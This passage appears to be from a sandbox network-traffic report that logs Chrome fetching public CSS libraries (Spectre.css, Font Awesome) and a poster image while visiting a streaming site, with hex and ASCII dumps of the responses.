                                                                                                                                                                                          Data Ascii: skLBv2vmE+hBMCtbA7KX5drWyRT/2JsqZ2IvfB9Y4bWDNMFbJRFmC9E74SoS0CqulwjkC0+5bpcV1CZ8NMej4pjy0U+doDQsGyo1hzVJttIjhQ7GnBtRFN1UarUlH8F3xict+HY07rEzoUGPlWcjRFRr4/gChZgc3ZL2d8oAAAAASUVORK5CYII=)!important}#toast-container.toast-bottom-center>div,#toast-container.t
                                                                                                                                                                                          2024-12-15 11:37:52 UTC1369INData Raw: 31 35 70 78 20 31 35 70 78 20 31 35 70 78 20 35 30 70 78 3b 77 69 64 74 68 3a 32 35 65 6d 7d 23 74 6f 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 3e 64 69 76 2e 72 74 6c 7b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 35 30 70 78 20 31 35 70 78 20 31 35 70 78 7d 7d 2f 2a 21 20 53 70 65 63 74 72 65 2e 63 73 73 20 76 30 2e 35 2e 38 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 70 69 63 74 75 72 65 70 61 6e 32 2f 73 70 65 63 74 72 65 20 2a 2f 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d
                                                                                                                                                                                          Data Ascii: 15px 15px 15px 50px;width:25em}#toast-container>div.rtl{padding:15px 50px 15px 15px}}/*! Spectre.css v0.5.8 | MIT License | github.com/picturepan2/spectre */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}
                                                                                                                                                                                          2024-12-15 11:37:52 UTC1369INData Raw: 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 66 69 65 6c 64 73 65 74 7b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 6c 65 67 65 6e 64 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 7d 70 72 6f 67 72 65 73 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 74 65 78 74 61 72 65 61 7b 6f 76 65 72 66 6c 6f
                                                                                                                                                                                          Data Ascii: ::-moz-focus-inner{border-style:none;padding:0}fieldset{border:0;margin:0;padding:0}legend{box-sizing:border-box;color:inherit;display:table;max-width:100%;padding:0;white-space:normal}progress{display:inline-block;vertical-align:baseline}textarea{overflo
                                                                                                                                                                                          2024-12-15 11:37:52 UTC1369INData Raw: 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 68 31 2c 2e 68 32 2c 2e 68 33 2c 2e 68 34 2c 2e 68 35 2c 2e 68 36 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 7d 70 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 32 72 65 6d 7d 61 2c
                                                                                                                                                                                          Data Ascii: t:500;line-height:1.2;margin-bottom:.5em;margin-top:0}.h1,.h2,.h3,.h4,.h5,.h6{font-weight:500}.h1,h1{font-size:2rem}.h2,h2{font-size:1.6rem}.h3,h3{font-size:1.4rem}.h4,h4{font-size:1.2rem}.h5,h5{font-size:1rem}.h6,h6{font-size:.8rem}p{margin:0 0 1.2rem}a,
                                                                                                                                                                                          2024-12-15 11:37:52 UTC1369INData Raw: 67 69 6e 6f 20 53 61 6e 73 20 43 4e 53 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 22 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 6c 61 6e 67 2d 6a 61 2c 68 74 6d 6c 3a 6c 61 6e 67 28 6a 61 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 22 53 65 67 6f 65 20 55 49 22 2c 52 6f 62 6f 74 6f 2c 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 22 59 75 20 47 6f 74 68 69 63 22 2c 59 75 47 6f 74 68 69 63 2c 4d 65 69 72 79 6f 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 73 61 6e 73 2d 73 65
                                                                                                                                                                                          Data Ascii: gino Sans CNS","Microsoft JhengHei","Helvetica Neue",sans-serif}.lang-ja,html:lang(ja){font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Roboto,"Hiragino Sans","Hiragino Kaku Gothic Pro","Yu Gothic",YuGothic,Meiryo,"Helvetica Neue",sans-se
                                                                                                                                                                                          2024-12-15 11:37:52 UTC1369INData Raw: 74 61 62 6c 65 20 74 68 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 2e 31 72 65 6d 7d 2e 62 74 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 2e 30 35 72 65 6d 20 73 6f 6c 69 64 20 23 35 37 35 35 64 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 31 72 65 6d 3b 63 6f 6c 6f 72 3a 23 35 37 35 35 64 39 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 38 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68
                                                                                                                                                                                          Data Ascii: table th{border-bottom-width:.1rem}.btn{-webkit-appearance:none;-moz-appearance:none;appearance:none;background:#fff;border:.05rem solid #5755d9;border-radius:.1rem;color:#5755d9;cursor:pointer;display:inline-block;font-size:.8rem;height:1.8rem;line-heigh


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          2192.168.2.1649711104.17.24.144436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:52 UTC582OUTGET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1
                                                                                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:53 UTC952INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:52 GMT
                                                                                                                                                                                          Content-Type: text/css; charset=utf-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                                                                                          ETag: W/"5eb03e5f-7918"
                                                                                                                                                                                          Last-Modified: Mon, 04 May 2020 16:10:07 GMT
                                                                                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                          Age: 208792
                                                                                                                                                                                          Expires: Fri, 05 Dec 2025 11:37:52 GMT
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4QheTF4d7adMm6CvODPOPdFVx%2BILd6NphzUAAUGmKLVJc%2FZOQWn1pvDbATDBFLgHe9rqN6%2FIaWL65ntycy7w%2BmXUirshxpYYWL0OvD75Wx9G104%2FU63%2F%2B689JC5A7Kxh9KpwjZNR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f2624e99af74246-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          2024-12-15 11:37:53 UTC417INData Raw: 37 39 31 38 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 37
                                                                                                                                                                                          Data Ascii: 7918/*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61
                                                                                                                                                                                          Data Ascii: '../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{displa
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64
                                                                                                                                                                                          Data Ascii: %{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359d
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 74 61 63 6b 2d 31 78 2c 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 61 2d 73 74 61 63 6b 2d 31 78 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 2d 67 6c 61 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 30 22 7d 2e 66 61 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 31 22 7d 2e 66 61 2d 73 65 61 72 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30
                                                                                                                                                                                          Data Ascii: tack-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f00
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 33 22 7d 2e 66 61 2d 66 6c 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 34 22 7d 2e 66 61 2d 68 65 61 64 70 68 6f 6e 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 35 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 36 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 37 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 38 22 7d 2e 66 61 2d 71 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 39 22 7d 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72
                                                                                                                                                                                          Data Ascii: ore{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:befor
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 38 22 7d 2e 66 61 2d 66 61 73 74 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 39 22 7d 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 61 22 7d 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 62 22 7d 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 63 22 7d 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 64 22 7d 2e 66 61 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 65 22 7d 2e 66 61 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63
                                                                                                                                                                                          Data Ascii: fore{content:"\f048"}.fa-fast-backward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{c
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 7d 2e 66 61 2d 65 79 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 30 22 7d 2e 66 61 2d 77 61 72 6e 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 31 22 7d 2e 66 61 2d 70 6c 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 32 22 7d 2e 66 61 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 33 22 7d 2e 66 61 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 34 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62
                                                                                                                                                                                          Data Ascii: }.fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:b
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 35 22 7d 2e 66 61 2d 73 71 75 61 72 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 36 22 7d 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 37 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 38 22 7d 2e 66 61 2d 74 77 69 74 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 39 22 7d 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 61 22 7d 2e 66 61 2d 67 69 74 68 75 62 3a 62 65 66 6f 72 65 7b
                                                                                                                                                                                          Data Ascii: -phone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 3a 22 5c 66 30 63 36 22 7d 2e 66 61 2d 73 61 76 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 6c 6f 70 70 79 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 37 22 7d 2e 66 61 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 38 22 7d 2e 66 61 2d 6e 61 76 69 63 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 6f 72 64 65 72 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 39 22 7d 2e 66 61 2d 6c 69 73 74 2d 75 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 61 22 7d 2e 66 61 2d 6c 69 73 74 2d 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 62 22 7d 2e 66 61 2d 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 62 65
                                                                                                                                                                                          Data Ascii: :"\f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:be
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1369INData Raw: 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 39 22 7d 2e 66 61 2d 70 61 73 74 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 69 70 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 61 22 7d 2e 66 61 2d 6c 69 67 68 74 62 75 6c 62 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 62 22 7d 2e 66 61 2d 65 78 63 68 61 6e 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 63 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 65 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 7b 63
                                                                                                                                                                                          Data Ascii: :before{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{c


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          3192.168.2.1649712151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:52 UTC692OUTGET /images/M/MV5BOTQ1NmFjMzEtNTkxYS00ZjY5LTgxN2UtMWM0NTlkZjc4MzNmL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:53 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 32742
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 380c8ef3-3aac-45d1-88ee-8e20f09aba7f
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sat, 17 Dec 2016 23:07:33 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 01 Dec 2044 16:05:47 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 761525
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:53 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200096-IAD, cache-ewr-kewr1740038-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
